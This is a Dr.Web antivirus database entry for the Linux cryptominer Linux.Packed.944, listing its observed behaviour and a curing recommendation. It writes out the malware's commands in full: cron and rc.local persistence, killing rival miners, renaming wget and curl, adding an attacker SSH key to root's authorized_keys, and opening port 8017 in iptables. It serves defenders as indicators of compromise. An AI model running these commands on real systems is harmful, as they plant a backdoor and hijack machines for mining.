Meine Bibliothek
Meine Bibliothek

+ Zur Bibliothek hinzufügen

Support

Ihre Anfragen

Rufen Sie uns an

+7 (495) 789-45-86

Profil

Linux.Packed.944

Added to the Dr.Web virus database: 2020-10-05

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/rc.local
  • /etc/crontab
  • /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
  • /root/.ssh/authorized_keys
Modifies firewall settings:
  • iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
  • iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
  • iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Launches processes:
  • <SAMPLE_FULL_PATH> -deamon
  • sh -c ps -ef | grep Circle_MI | grep -v grep | awk '{print $2}' | xargs kill -9
  • ps -ef
  • grep -v grep
  • grep Circle_MI
  • awk {print $2}
  • xargs kill -9
  • kill -9
  • sh -c ps -ef | grep kworker34 | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep kworker34
  • sh -c ps -ef | grep .daemond | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep .daemond
  • sh -c ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /tmp/thisxxs
  • sh -c ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /opt/yilu/work/xig/xig
  • sh -c ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /opt/yilu/mservice
  • sh -c ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /usr/bin/.sshd
  • sh -c ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /usr/bin/bsd-port/getty
  • sh -c ps -ef | grep x86_ | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep x86_
  • sh -c ps -ef | grep cryptonight | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep cryptonight
  • sh -c ps -ef | grep ddg | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep ddg
  • sh -c ps -ef | grep prohash | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep prohash
  • sh -c ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep monero
  • sh -c ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep xmr
  • sh -c ps -ef | grep miner | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep miner
  • sh -c ps -ef | grep pool. | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep pool.
  • sh -c ps -ef | grep tcp: | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep tcp:
  • sh -c ps -ef | grep stratum | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep stratum
  • sh -c killall xmr
  • sh -c mv /usr/bin/wget /usr/bin/wget1&
  • mv /usr/bin/wget /usr/bin/wget1
  • sh -c mv /usr/bin/curl /usr/bin/curl1&
  • mv /usr/bin/curl /usr/bin/curl1
  • sh -c chmod +x /tmp/xmr
  • chmod +x /tmp/xmr
  • sh -c /tmp/xmr
  • /tmp/xmr
  • sh -c chmod +x /tmp/secure.sh
  • chmod +x /tmp/secure.sh
  • sh -c /tmp/secure.sh&
  • /tmp/secure.sh
  • sh -c chmod +x /tmp/auth.sh
  • chmod +x /tmp/auth.sh
  • sh -c /tmp/auth.sh&
  • date +%b %e %H
  • /tmp/auth.sh
  • sh -c mkdir -p /usr/.work
  • grep Oct 5 17 /var/log/secure
  • grep Failed
  • sort
  • awk {print $(NF-3)}
  • uniq -c
  • awk $1>\"$LIMIT\"{print $1\":\"$2}
  • mkdir -p /usr/.work
  • sh -c \cp -R /root/* /usr/.work/ &
  • sleep 60
  • grep Oct 5 17 /var/log/auth.log
  • sh -c mkdir -p /root/.ssh
  • cp -R <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /usr/.work/
  • mkdir -p /root/.ssh
  • sh -c chmod 700 /root/.ssh/
  • chmod 700 /root/.ssh/
  • sh -c echo >> /root/.ssh/authorized_keys
  • sh -c chmod 600 /root/.ssh/authorized_keys
  • chmod 600 /root/.ssh/authorized_keys
  • sh -c echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys
  • sh -c iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
  • sh -c iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
  • sh -c iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Attempts to kill the following processes:
  • killall xmr
Performs operations with the file system:
Modifies file access rights:
  • /tmp/xmr
  • /tmp/secure.sh
  • /tmp/auth.sh
  • /root/.ssh
  • /root/.ssh/authorized_keys
Creates folders:
  • /usr/.work
  • /root/.ssh
Creates or modifies files:
  • /tmp/config.json
  • /tmp/xmr
  • /usr/bin/wget
  • /tmp/secure.sh
  • /tmp/auth.sh
  • /usr/.work/<SAMPLE>
  • /usr/.work/run.sh
  • /usr/.work/stdout.log
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:14747
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 16#.###.226.137:6666
DNS ASK:
  • xm#.##ypto-pool.fr
Sends data to the following servers:
  • 16#.###.226.137:6666
Receives data from the following servers:
  • 16#.###.226.137:6666
Other:
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number